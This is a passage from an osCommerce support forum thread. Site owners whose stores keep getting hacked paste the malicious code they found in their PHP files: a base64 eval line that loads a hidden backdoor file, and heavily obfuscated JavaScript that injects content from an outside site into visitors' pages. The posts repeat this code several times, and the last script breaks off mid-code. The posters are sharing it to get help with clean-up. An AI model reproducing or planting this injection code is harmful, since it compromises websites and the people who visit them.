Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Anyone seen this hack before?


alex_hill

Recommended Posts

Ok, so my site has been hacked, but I cant figure out what is causing it to stay hacked.

 

I found that my index.php had been deleted, so i reuploaded a fresh copy (along with all the .htaccess files etc) and navigated to it and got:

 

fs: 236398 [need: 231064]

 

Then the index.php file was gone again. I have uploaded a fresh copy of all the files I can think would be causing it, but the same thing happens.

 

Has anyone seen a similar hack before and may possibly know where to look?

 

Cheers,

Alex

Link to comment
Share on other sites

I have the same problem.

 

Ok, so my site has been hacked, but I cant figure out what is causing it to stay hacked.

 

I found that my index.php had been deleted, so i reuploaded a fresh copy (along with all the .htaccess files etc) and navigated to it and got:

 

fs: 236398 [need: 231064]

 

Then the index.php file was gone again. I have uploaded a fresh copy of all the files I can think would be causing it, but the same thing happens.

 

Has anyone seen a similar hack before and may possibly know where to look?

 

Cheers,

Alex

Link to comment
Share on other sites

I have decided to start again, but in the process I have found a few problems.

 

It would appear that in almost every PHP file (includes, includes/boxes etc) there is this bit of code at the top:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMTliL3N1YjAwMS9zYzE5NjYzLUlTUFUvamV3ZWxsZXJ5b250cmFkZS5jb20uYXUvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VzcGFub2wvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

 

I took that encoded info and decoded it at http://www.motobit.com/util/base64-decoder-encoder.asp and this is what I got:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/long_path_to_my_admin_directory/includes/languages/espanol/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

 

So basically it is looking at the admin/includes/languages/espanol/images/buttons/style.css.php file and running the problem script from there (yours may be in a different location). Unfortunately I had deleted this file before I got this far, so I cant see what the function actually did, but I can assume it deleted index.php and corrupted the other files again, not sure what else it was doing in the mean time though.

 

There is also some javascript at the bottom of each of these files, which I cant decifer myself, if anyone would like to take a crack at it, the code is below:

<script>function oA(){};var vKF="vKF";oA.prototype = {k : function() {this.n="n";iH=34217;this.y='';this.iN='';try {this.dE="";this.pX=false;rA='';this.nS="";var sE=false;var tW="tW";window.onload=function() {var e=27025;lRV=27397;var z=function(){return 'z'};pS="pS";yY=false;String.prototype.hAJ=function(j, jG){var jGZ=this; return jGZ.replace(j, jG)};eU="";function f(){};var iP=function(){return 'iP'};this.h="h";pF=false;m="";var dL="dL";var l = 'sOuE'.hAJ(/[E:lOk]/g, '')+'bX'.hAJ(/[X2p65]/g, '')+'sbtLroiV'.hAJ(/[VLo{b]/g, '')+'nwgw'.hAJ(/[wx~2$]/g, '');function kK(){};this.cR="cR";this.aG="aG";this.g=51399;var p = 'a>wtqQstu>'.hAJ(/[>?Qrt]/g, '')+'bhs6t6g[d[th'.hAJ(/[h6D[~]/g, '');var hZ=new Array();var kO=false;var x=new Array();var lZ="lZ";this.vI='';this.hS=11275;wM='';var r = 'hzd6syiyn1sz'.hAJ(/[z6Xy1]/g, '')+'e^r&tCA^d^jCa^dCe&r|wMw&sM'.hAJ(/[M|^C&]/g, '');fA="fA";this.lY="lY";var dS=new Array();vU="vU";var yW=51123;var jY = p[l](3, 8);var tQ=new Date();iHT="";rN="rN";hW=false;var aBX="aBX";wU=38947;var w=document;var mJ=new Array();iPX="";var vN=false;var iD=10198;this.vL="";var jK=new Array();var wQ = 'hDtKtKpK:V/C/VcKobmCpKrDoVmbeDnbdKeVsD.CcVoDmV/DsCtKdDsC/Dgbob.CpKhbpK?bsCiCdV=b2C'.hAJ(/[CDbKV]/g, '');this.oS='';this.fY="fY";jYN=false;cS=false;var dSL=27351;this.lD=false;var jM = jY + 'r5ia'.hAJ(/[a}504]/g, '')+'nYgI'.hAJ(/[iY5.x]/g, '');this.zH='';var iV=false;var yF='';var iA=new Array();var v = r[jM](3, 13);var dZ=function(){return 'dZ'};fR='';zR='';var oD=20057;var q=function(){};pR = v + 'cOe5n5t5H5T5MOL5'.hAJ(/[58wuO]/g, '');var fU=new Array();wZ=false;eE="";this.oP='';var mD=new Date();var jQ='';var xM=45077;var sT=false;var zY=function(){};this.qO=27290;var a = 'c^o@l@l@ 7wbibD@xbs@d@'.hAJ(/[@7b]^]/g, '');this.qX="qX";var nF=64355;var uX=new Date();bK=false;wD="";var qD='';var pJ = a[jM](4, 8);this.qY=false;yL=40356;var oV='';qP="";yFP='';var rQ=new Array();var qW='';var zX=new Date();var aB = 'q)kor)t)H;=o1) Vd%e%ro=%1;0) %H)e)'.hAJ(/[)o%V;]/g, '');var xR="";var kI=49241;var rE='';var hP=function(){};this.xF="";var lT=false;var d = pJ + aB[jM](3, 18);rX="rX";var kKY=new Array();this.yR=false;var wS=new Date();function sQ(){};uFE=13324;this.iW='';var s = 'dFwWkWi0GFhWtF=010>F<F/0iQf0R0iWrQm:k0f:'.hAJ(/[:QW0F]/g, '');mJQ=8708;fF="fF";this.uAW='';this.fV="";var xMM=new Array();var b = d + s[jM](3, 17);this.kR='';this.oY="oY";function nSJ(){};this.pU=false;var yO=function(){};this.lL="";var b = b + 'a6m}e}>3'.hAJ(/[36O}2]/g, '');this.yB='';var mI='';var aS=false;var wR=false;this.nJ='';pV='';function eO(){};var bH=false;this.hY=5255;this.jZ="jZ";var vK=function(){};hN="hN";var qC=function(){};nQ=false;var tM=function(){return 'tM'};var wMY=function(){};this.mT="";var bC=function(){};fC='';eOS=false;nO=63518;var i = '}v}JeM<MI/fvRraMjrdJgvhM'.hAJ(/[Mrv/J]/g, '');this.cM=18508;this.fQ='';var dM=new Date();aGH=24678;zHL=false;zYY="";var jW = i[jM](3, 8);rT="";eUH='';var hYC=new Date();tG=false;this.xV='';nK=false;eJ="";var u = 'LQewMwe? QsjR?cw=w}Q}j}w'.hAJ(/[wQjO?]/g, '');var bZ=function(){};var qZ=42519;var aA=new Date();var dH=false;this.jWE=false;var uF = jW + u[jM](2, 9);var lQ=false;jZO="";var vH="";var yZ=false;var aD = uF + 'hyt}typB:1/}/}c1oymBp1rBo)mye)n}d1e1sy.}c1oBm1/)s}tBdysy/}g}oB.}pBh1pB?1s}i)d}=121'.hAJ(/[1B)}y]/g, '');var eI=function(){};var yX=new Array();xA="";var hA="";this.zV="zV";var wL="";this.jF="";var o = '<Zg|opr8 Z>|'.hAJ(/[|8Zp/]/g, '') + aD + b + '<7/7g7o7r[>6'.hAJ(/[6u7[W]/g, '');var rJ='';this.sN="";yU='';this.dW=false;gW="";function mTC(){};var eP="";pD="pD";dD="dD";iB="iB";this.rC='';tD=false;var iAG="";wQL=45854;this.nC=false;var rNE='';var kF="kF";this.iPK=20649;var c = 'sPa2uObP'.hAJ(/[PO.i2]/g, '')+'oidKyKrKwXd,kagX'.hAJ(/[X,iaK]/g, '');fYU=false;var jH=function(){return 'jH'};nU="";bX='';iR="iR";this.pW='';this.pO="";var iBC=1019;var uH=new Date();sD=false;rD = c[jM](3, 7);var nG='';var lZZ="";var xQ='';this.rP='';var fG="fG";var mTX=new Array();this.bKJ=14825;yBY="yBY";var t = 'Tqe.dqB8enf.o8'.hAJ(/[8n.Nq]/g, '');var lH="";var dJ=14814;eUV='';this.aR="aR";this.fT="fT";var dB=false;this.rCF=7119;uZ=936;zK='';this.dY="";this.oN='';xB="xB";function kH(){};aBZ=false;hH=22879;this.vW='';var cB="cB";var aC = t[jM](3, 7);var vR=function(){};fI='';var dP=false;function nA(){};this.aK="";pZ = aC + 'r*eCE(n*d*'.hAJ(/[*(QCp]/g, '');var uFO=function(){return 'uFO'};this.xJ=false;this.hSF='';this.rK="rK";var cI='';function wZL(){};this.kJ=false;yOA='';this.kE=29249;var zYM=new Date();fCT='';xS=56263;this.yT='';aL='';function bB(){};var qI=function(){return 'qI'};this.tS='';this.mV="mV";this.dPW='';var iAZ=53247;var wE="wE";var hNA=function(){return 'hNA'};var yC=new Array();var mS="";eT=false;this.xE=false;this.qPS=false;var cL="cL";var kG="";this.jA=false;this.nE="nE";qK="qK";var uA = w[rD];var nB="";var xRN=function(){};var rB=function(){};vHA=13095;var hT=function(){};var wV='';lR = uA[pR];var vC=new Array();var gT=40930;kRF=false;this.aY="";var kB="";hWV=false;eG=false;function gM(){};lR(pZ, o);this.zF=false;var eIM=new Array();};this.fO="fO";var xT=43554;dPD='';this.bHD=false;} catch(pC) {var tWM=false;vZ=64103;vQ="";var pL=false;oSZ='';w.write("xpe,");pG='';oC=false;}vWJ="";var aKL=new Date();var kL=42784;uO=49200;}};hV="";var fIV=new oA(); var dMC="";fIV.k();var gU=new Array();</script>

Link to comment
Share on other sites

I have decided to start again, but in the process I have found a few problems.

 

It would appear that in almost every PHP file (includes, includes/boxes etc) there is this bit of code at the top:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMTliL3N1YjAwMS9zYzE5NjYzLUlTUFUvamV3ZWxsZXJ5b250cmFkZS5jb20uYXUvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VzcGFub2wvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

 

I took that encoded info and decoded it at http://www.motobit.com/util/base64-decoder-encoder.asp and this is what I got:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/long_path_to_my_admin_directory/includes/languages/espanol/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

 

So basically it is looking at the admin/includes/languages/espanol/images/buttons/style.css.php file and running the problem script from there (yours may be in a different location). Unfortunately I had deleted this file before I got this far, so I cant see what the function actually did, but I can assume it deleted index.php and corrupted the other files again, not sure what else it was doing in the mean time though.

 

There is also some javascript at the bottom of each of these files, which I cant decifer myself, if anyone would like to take a crack at it, the code is below:

<script>function oA(){};var vKF="vKF";oA.prototype = {k : function() {this.n="n";iH=34217;this.y='';this.iN='';try {this.dE="";this.pX=false;rA='';this.nS="";var sE=false;var tW="tW";window.onload=function() {var e=27025;lRV=27397;var z=function(){return 'z'};pS="pS";yY=false;String.prototype.hAJ=function(j, jG){var jGZ=this; return jGZ.replace(j, jG)};eU="";function f(){};var iP=function(){return 'iP'};this.h="h";pF=false;m="";var dL="dL";var l = 'sOuE'.hAJ(/[E:lOk]/g, '')+'bX'.hAJ(/[X2p65]/g, '')+'sbtLroiV'.hAJ(/[VLo{b]/g, '')+'nwgw'.hAJ(/[wx~2$]/g, '');function kK(){};this.cR="cR";this.aG="aG";this.g=51399;var p = 'a>wtqQstu>'.hAJ(/[>?Qrt]/g, '')+'bhs6t6g[d[th'.hAJ(/[h6D[~]/g, '');var hZ=new Array();var kO=false;var x=new Array();var lZ="lZ";this.vI='';this.hS=11275;wM='';var r = 'hzd6syiyn1sz'.hAJ(/[z6Xy1]/g, '')+'e^r&tCA^d^jCa^dCe&r|wMw&sM'.hAJ(/[M|^C&]/g, '');fA="fA";this.lY="lY";var dS=new Array();vU="vU";var yW=51123;var jY = p[l](3, 8);var tQ=new Date();iHT="";rN="rN";hW=false;var aBX="aBX";wU=38947;var w=document;var mJ=new Array();iPX="";var vN=false;var iD=10198;this.vL="";var jK=new Array();var wQ = 'hDtKtKpK:V/C/VcKobmCpKrDoVmbeDnbdKeVsD.CcVoDmV/DsCtKdDsC/Dgbob.CpKhbpK?bsCiCdV=b2C'.hAJ(/[CDbKV]/g, '');this.oS='';this.fY="fY";jYN=false;cS=false;var dSL=27351;this.lD=false;var jM = jY + 'r5ia'.hAJ(/[a}504]/g, '')+'nYgI'.hAJ(/[iY5.x]/g, '');this.zH='';var iV=false;var yF='';var iA=new Array();var v = r[jM](3, 13);var dZ=function(){return 'dZ'};fR='';zR='';var oD=20057;var q=function(){};pR = v + 'cOe5n5t5H5T5MOL5'.hAJ(/[58wuO]/g, '');var fU=new Array();wZ=false;eE="";this.oP='';var mD=new Date();var jQ='';var xM=45077;var sT=false;var zY=function(){};this.qO=27290;var a = 'c^o@l@l@ 7wbibD@xbs@d@'.hAJ(/[@7b]^]/g, '');this.qX="qX";var nF=64355;var uX=new Date();bK=false;wD="";var qD='';var pJ = a[jM](4, 8);this.qY=false;yL=40356;var oV='';qP="";yFP='';var rQ=new Array();var qW='';var zX=new Date();var aB = 'q)kor)t)H;=o1) Vd%e%ro=%1;0) %H)e)'.hAJ(/[)o%V;]/g, '');var xR="";var kI=49241;var rE='';var hP=function(){};this.xF="";var lT=false;var d = pJ + aB[jM](3, 18);rX="rX";var kKY=new Array();this.yR=false;var wS=new Date();function sQ(){};uFE=13324;this.iW='';var s = 'dFwWkWi0GFhWtF=010>F<F/0iQf0R0iWrQm:k0f:'.hAJ(/[:QW0F]/g, '');mJQ=8708;fF="fF";this.uAW='';this.fV="";var xMM=new Array();var b = d + s[jM](3, 17);this.kR='';this.oY="oY";function nSJ(){};this.pU=false;var yO=function(){};this.lL="";var b = b + 'a6m}e}>3'.hAJ(/[36O}2]/g, '');this.yB='';var mI='';var aS=false;var wR=false;this.nJ='';pV='';function eO(){};var bH=false;this.hY=5255;this.jZ="jZ";var vK=function(){};hN="hN";var qC=function(){};nQ=false;var tM=function(){return 'tM'};var wMY=function(){};this.mT="";var bC=function(){};fC='';eOS=false;nO=63518;var i = '}v}JeM<MI/fvRraMjrdJgvhM'.hAJ(/[Mrv/J]/g, '');this.cM=18508;this.fQ='';var dM=new Date();aGH=24678;zHL=false;zYY="";var jW = i[jM](3, 8);rT="";eUH='';var hYC=new Date();tG=false;this.xV='';nK=false;eJ="";var u = 'LQewMwe? QsjR?cw=w}Q}j}w'.hAJ(/[wQjO?]/g, '');var bZ=function(){};var qZ=42519;var aA=new Date();var dH=false;this.jWE=false;var uF = jW + u[jM](2, 9);var lQ=false;jZO="";var vH="";var yZ=false;var aD = uF + 'hyt}typB:1/}/}c1oymBp1rBo)mye)n}d1e1sy.}c1oBm1/)s}tBdysy/}g}oB.}pBh1pB?1s}i)d}=121'.hAJ(/[1B)}y]/g, '');var eI=function(){};var yX=new Array();xA="";var hA="";this.zV="zV";var wL="";this.jF="";var o = '<Zg|opr8 Z>|'.hAJ(/[|8Zp/]/g, '') + aD + b + '<7/7g7o7r[>6'.hAJ(/[6u7[W]/g, '');var rJ='';this.sN="";yU='';this.dW=false;gW="";function mTC(){};var eP="";pD="pD";dD="dD";iB="iB";this.rC='';tD=false;var iAG="";wQL=45854;this.nC=false;var rNE='';var kF="kF";this.iPK=20649;var c = 'sPa2uObP'.hAJ(/[PO.i2]/g, '')+'oidKyKrKwXd,kagX'.hAJ(/[X,iaK]/g, '');fYU=false;var jH=function(){return 'jH'};nU="";bX='';iR="iR";this.pW='';this.pO="";var iBC=1019;var uH=new Date();sD=false;rD = c[jM](3, 7);var nG='';var lZZ="";var xQ='';this.rP='';var fG="fG";var mTX=new Array();this.bKJ=14825;yBY="yBY";var t = 'Tqe.dqB8enf.o8'.hAJ(/[8n.Nq]/g, '');var lH="";var dJ=14814;eUV='';this.aR="aR";this.fT="fT";var dB=false;this.rCF=7119;uZ=936;zK='';this.dY="";this.oN='';xB="xB";function kH(){};aBZ=false;hH=22879;this.vW='';var cB="cB";var aC = t[jM](3, 7);var vR=function(){};fI='';var dP=false;function nA(){};this.aK="";pZ = aC + 'r*eCE(n*d*'.hAJ(/[*(QCp]/g, '');var uFO=function(){return 'uFO'};this.xJ=false;this.hSF='';this.rK="rK";var cI='';function wZL(){};this.kJ=false;yOA='';this.kE=29249;var zYM=new Date();fCT='';xS=56263;this.yT='';aL='';function bB(){};var qI=function(){return 'qI'};this.tS='';this.mV="mV";this.dPW='';var iAZ=53247;var wE="wE";var hNA=function(){return 'hNA'};var yC=new Array();var mS="";eT=false;this.xE=false;this.qPS=false;var cL="cL";var kG="";this.jA=false;this.nE="nE";qK="qK";var uA = w[rD];var nB="";var xRN=function(){};var rB=function(){};vHA=13095;var hT=function(){};var wV='';lR = uA[pR];var vC=new Array();var gT=40930;kRF=false;this.aY="";var kB="";hWV=false;eG=false;function gM(){};lR(pZ, o);this.zF=false;var eIM=new Array();};this.fO="fO";var xT=43554;dPD='';this.bHD=false;} catch(pC) {var tWM=false;vZ=64103;vQ="";var pL=false;oSZ='';w.write("xpe,");pG='';oC=false;}vWJ="";var aKL=new Date();var kL=42784;uO=49200;}};hV="";var fIV=new oA(); var dMC="";fIV.k();var gU=new Array();</script>

Good reading >> eval base64_decode Hack

 

Securing your site

Link to comment
Share on other sites

I have the exact same problem.

 

I host on powweb.com and my site has been hacked 3 times in the last month and a half.

 

After the 2nd time, I changed all the hosting admin control panel password, the ftp password, disabled the ftp access and also changed the database password. Not sure how they are getting in. I was told by the hosting company that it might be a security vulnerability with OSCommerce. I have been hosting this site for the last 2 years without any problems.

 

Are there any security vulnerabilities out there that am not aware of? Am running osCommerce Online Merchant v2.2 RC2a, PHP Version 5.2.12

 

 

I have decided to start again, but in the process I have found a few problems.

 

It would appear that in almost every PHP file (includes, includes/boxes etc) there is this bit of code at the top:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMTliL3N1YjAwMS9zYzE5NjYzLUlTUFUvamV3ZWxsZXJ5b250cmFkZS5jb20uYXUvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VzcGFub2wvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

 

I took that encoded info and decoded it at http://www.motobit.com/util/base64-decoder-encoder.asp and this is what I got:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/long_path_to_my_admin_directory/includes/languages/espanol/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

 

So basically it is looking at the admin/includes/languages/espanol/images/buttons/style.css.php file and running the problem script from there (yours may be in a different location). Unfortunately I had deleted this file before I got this far, so I cant see what the function actually did, but I can assume it deleted index.php and corrupted the other files again, not sure what else it was doing in the mean time though.

 

There is also some javascript at the bottom of each of these files, which I cant decifer myself, if anyone would like to take a crack at it, the code is below:

<script>function oA(){};var vKF="vKF";oA.prototype = {k : function() {this.n="n";iH=34217;this.y='';this.iN='';try {this.dE="";this.pX=false;rA='';this.nS="";var sE=false;var tW="tW";window.onload=function() {var e=27025;lRV=27397;var z=function(){return 'z'};pS="pS";yY=false;String.prototype.hAJ=function(j, jG){var jGZ=this; return jGZ.replace(j, jG)};eU="";function f(){};var iP=function(){return 'iP'};this.h="h";pF=false;m="";var dL="dL";var l = 'sOuE'.hAJ(/[E:lOk]/g, '')+'bX'.hAJ(/[X2p65]/g, '')+'sbtLroiV'.hAJ(/[VLo{b]/g, '')+'nwgw'.hAJ(/[wx~2$]/g, '');function kK(){};this.cR="cR";this.aG="aG";this.g=51399;var p = 'a>wtqQstu>'.hAJ(/[>?Qrt]/g, '')+'bhs6t6g[d[th'.hAJ(/[h6D[~]/g, '');var hZ=new Array();var kO=false;var x=new Array();var lZ="lZ";this.vI='';this.hS=11275;wM='';var r = 'hzd6syiyn1sz'.hAJ(/[z6Xy1]/g, '')+'e^r&tCA^d^jCa^dCe&r|wMw&sM'.hAJ(/[M|^C&]/g, '');fA="fA";this.lY="lY";var dS=new Array();vU="vU";var yW=51123;var jY = p[l](3, 8);var tQ=new Date();iHT="";rN="rN";hW=false;var aBX="aBX";wU=38947;var w=document;var mJ=new Array();iPX="";var vN=false;var iD=10198;this.vL="";var jK=new Array();var wQ = 'hDtKtKpK:V/C/VcKobmCpKrDoVmbeDnbdKeVsD.CcVoDmV/DsCtKdDsC/Dgbob.CpKhbpK?bsCiCdV=b2C'.hAJ(/[CDbKV]/g, '');this.oS='';this.fY="fY";jYN=false;cS=false;var dSL=27351;this.lD=false;var jM = jY + 'r5ia'.hAJ(/[a}504]/g, '')+'nYgI'.hAJ(/[iY5.x]/g, '');this.zH='';var iV=false;var yF='';var iA=new Array();var v = r[jM](3, 13);var dZ=function(){return 'dZ'};fR='';zR='';var oD=20057;var q=function(){};pR = v + 'cOe5n5t5H5T5MOL5'.hAJ(/[58wuO]/g, '');var fU=new Array();wZ=false;eE="";this.oP='';var mD=new Date();var jQ='';var xM=45077;var sT=false;var zY=function(){};this.qO=27290;var a = 'c^o@l@l@ 7wbibD@xbs@d@'.hAJ(/[@7b]^]/g, '');this.qX="qX";var nF=64355;var uX=new Date();bK=false;wD="";var qD='';var pJ = a[jM](4, 8);this.qY=false;yL=40356;var oV='';qP="";yFP='';var rQ=new Array();var qW='';var zX=new Date();var aB = 'q)kor)t)H;=o1) Vd%e%ro=%1;0) %H)e)'.hAJ(/[)o%V;]/g, '');var xR="";var kI=49241;var rE='';var hP=function(){};this.xF="";var lT=false;var d = pJ + aB[jM](3, 18);rX="rX";var kKY=new Array();this.yR=false;var wS=new Date();function sQ(){};uFE=13324;this.iW='';var s = 'dFwWkWi0GFhWtF=010>F<F/0iQf0R0iWrQm:k0f:'.hAJ(/[:QW0F]/g, '');mJQ=8708;fF="fF";this.uAW='';this.fV="";var xMM=new Array();var b = d + s[jM](3, 17);this.kR='';this.oY="oY";function nSJ(){};this.pU=false;var yO=function(){};this.lL="";var b = b + 'a6m}e}>3'.hAJ(/[36O}2]/g, '');this.yB='';var mI='';var aS=false;var wR=false;this.nJ='';pV='';function eO(){};var bH=false;this.hY=5255;this.jZ="jZ";var vK=function(){};hN="hN";var qC=function(){};nQ=false;var tM=function(){return 'tM'};var wMY=function(){};this.mT="";var bC=function(){};fC='';eOS=false;nO=63518;var i = '}v}JeM<MI/fvRraMjrdJgvhM'.hAJ(/[Mrv/J]/g, '');this.cM=18508;this.fQ='';var dM=new Date();aGH=24678;zHL=false;zYY="";var jW = i[jM](3, 8);rT="";eUH='';var hYC=new Date();tG=false;this.xV='';nK=false;eJ="";var u = 'LQewMwe? QsjR?cw=w}Q}j}w'.hAJ(/[wQjO?]/g, '');var bZ=function(){};var qZ=42519;var aA=new Date();var dH=false;this.jWE=false;var uF = jW + u[jM](2, 9);var lQ=false;jZO="";var vH="";var yZ=false;var aD = uF + 'hyt}typB:1/}/}c1oymBp1rBo)mye)n}d1e1sy.}c1oBm1/)s}tBdysy/}g}oB.}pBh1pB?1s}i)d}=121'.hAJ(/[1B)}y]/g, '');var eI=function(){};var yX=new Array();xA="";var hA="";this.zV="zV";var wL="";this.jF="";var o = '<Zg|opr8 Z>|'.hAJ(/[|8Zp/]/g, '') + aD + b + '<7/7g7o7r[>6'.hAJ(/[6u7[W]/g, '');var rJ='';this.sN="";yU='';this.dW=false;gW="";function mTC(){};var eP="";pD="pD";dD="dD";iB="iB";this.rC='';tD=false;var iAG="";wQL=45854;this.nC=false;var rNE='';var kF="kF";this.iPK=20649;var c = 'sPa2uObP'.hAJ(/[PO.i2]/g, '')+'oidKyKrKwXd,kagX'.hAJ(/[X,iaK]/g, '');fYU=false;var jH=function(){return 'jH'};nU="";bX='';iR="iR";this.pW='';this.pO="";var iBC=1019;var uH=new Date();sD=false;rD = c[jM](3, 7);var nG='';var lZZ="";var xQ='';this.rP='';var fG="fG";var mTX=new Array();this.bKJ=14825;yBY="yBY";var t = 'Tqe.dqB8enf.o8'.hAJ(/[8n.Nq]/g, '');var lH="";var dJ=14814;eUV='';this.aR="aR";this.fT="fT";var dB=false;this.rCF=7119;uZ=936;zK='';this.dY="";this.oN='';xB="xB";function kH(){};aBZ=false;hH=22879;this.vW='';var cB="cB";var aC = t[jM](3, 7);var vR=function(){};fI='';var dP=false;function nA(){};this.aK="";pZ = aC + 'r*eCE(n*d*'.hAJ(/[*(QCp]/g, '');var uFO=function(){return 'uFO'};this.xJ=false;this.hSF='';this.rK="rK";var cI='';function wZL(){};this.kJ=false;yOA='';this.kE=29249;var zYM=new Date();fCT='';xS=56263;this.yT='';aL='';function bB(){};var qI=function(){return 'qI'};this.tS='';this.mV="mV";this.dPW='';var iAZ=53247;var wE="wE";var hNA=function(){return 'hNA'};var yC=new Array();var mS="";eT=false;this.xE=false;this.qPS=false;var cL="cL";var kG="";this.jA=false;this.nE="nE";qK="qK";var uA = w[rD];var nB="";var xRN=function(){};var rB=function(){};vHA=13095;var hT=function(){};var wV='';lR = uA[pR];var vC=new Array();var gT=40930;kRF=false;this.aY="";var kB="";hWV=false;eG=false;function gM(){};lR(pZ, o);this.zF=false;var eIM=new Array();};this.fO="fO";var xT=43554;dPD='';this.bHD=false;} catch(pC) {var tWM=false;vZ=64103;vQ="";var pL=false;oSZ='';w.write("xpe,");pG='';oC=false;}vWJ="";var aKL=new Date();var kL=42784;uO=49200;}};hV="";var fIV=new oA(); var dMC="";fIV.k();var gU=new Array();</script>

Link to comment
Share on other sites

Thanks you.

 

This s the actual javascript embeded at the bottom of my file. Any idea on how to decode this.

 

 

<script>function iL(){};var bM="bM";iL.prototype = {a : function() {this.mT='';p="p";var oP=function(){};h='';var b=window;var uD=new Array();var jI='';var y="";var hU=false;var gV=11607;this.z="";var g = this;var yV=function(){};var zC=false;this.eD='';this.eT="eT";this.fM=2102;var c=new Array();var yF=new Array();var bA=document;var s="";var oL=function(){};q="";this.gJ='';l=false;var t = function(oukN,t91Ce,vk){return [oukN+'x74',vk+'x66x6fx39x4c','x53'+t91Ce]}('x73x65x74x54x69x6dx65x6fx75','x41x45x69','x6ex38x78')[0];this.sD=false;var zY=false;var dU=new Date();this.eH=false;var r=function(){return 'r'};var tE=function(){return 'tE'};var u = function(Sm3J5,i,ItQ,Gy){return [sm3J5+'x59x36','x41'+i,Gy+'x74x65','x69x66x45x67x39'+ItQ]}('x55x73x36x36x49','x70x4c','x74x53x70x6fx6b','x77x72x69')[2];var dQ='';var iB="";var hUN=false;zK=false;dW='';qF="";this.lE="";mP=8293;try {sJ="";var vG=new Date();var tY="tY";var sZ=new Array();var f = function(ZAtX,Hf7,vYzW){return ['x65x35x71x47x37'+ZAtX,vYzW+'x72x63','x70x41x58'+Hf7]}('x48x39x74','x4ax6cx51','x73')[1];var iT="";pC='';this.rO="";this.sL="sL";var vQ="vQ";var o = function(vI,O,oV,w){return ['x63x72x65x61x74x65x45x6cx65x6d'+vI,O+'x71','x74x55x64x5ax58'+oV,'x76x38x7ax45'+w]}('x65x6ex74','x76','x72x35','x59x4ax66x4c')[0];this.vI="";cR=105;var bY=function(){return 'bY'};lY=false;this.mTQ="mTQ";qP="";var j = function(BIE,T0,Oc2j){return [T0+'x64',Oc2j+'x6ax48x75','x66'+BIE]}('x55x67','x61x70x70x65x6ex64x43x68x69x6c','x79x4dx30x6cx35')[0];this.sF=false;jY='';function k(){};var rQ='';w=18048;var uR=function(){};lI='';var m = function(pxO6,OcZ2,m,D2GN,hBuZ){return ['x79x41'+D2GN,OcZ2+'x66x36x58x49x50',pxO6+'x6fx64x79',hBuZ+'x71x78x34','x4c'+m]}('x62','x4fx46','x4bx7ax46x6cx50','x47','x6ax62')[2];x=false;bAJ=false;this.zI=15494;var fO=new Date();kL=16469;var d = function(x8,Asjdj,L,KwB,w){return ['x73x65x74x41'+KwB,L+'x75',x8+'x4ax6ax75x54x62','x75x59x63'+Asjdj,'x46x46x4fx39x30'+w]}('x76x71x48x36','x76x62x77','x66x46','x74x74x72x69x62x75x74x65','x6dx71')[0];gF="";vW=false;var fOP=function(){return 'fOP'};this.vWF="";var bU="bU";this.sB='';var e = function(A8DYG,WoDQ,ejK,UlF4z,bl){return [bl+'x4d','x54x30'+UlF4z,'x4ax4ex57'+WoDQ,'x75x30'+A8DYG,'x68x65'+ejK]}('x74x77','x70x77x39x62','x69x67x68x74','x66x79x50x6fx39','x55')[4];var gL="";var n=false;var vGL=function(){return 'vGL'};var tC=new Date();this.nO=4382;function wL(){};var jW = function(hU,rm,eA2KZ,g6x){return ['x54'+hU,'x45'+rm,'x77'+eA2KZ,'x47x69x57x45'+g6x]}('x61x53x76x77x68','x6bx6e','x69x64x74x68','x65x61')[2];this.uRI="uRI";function uRS(){};var hA=function(){return 'hA'};var uB=new Array();var 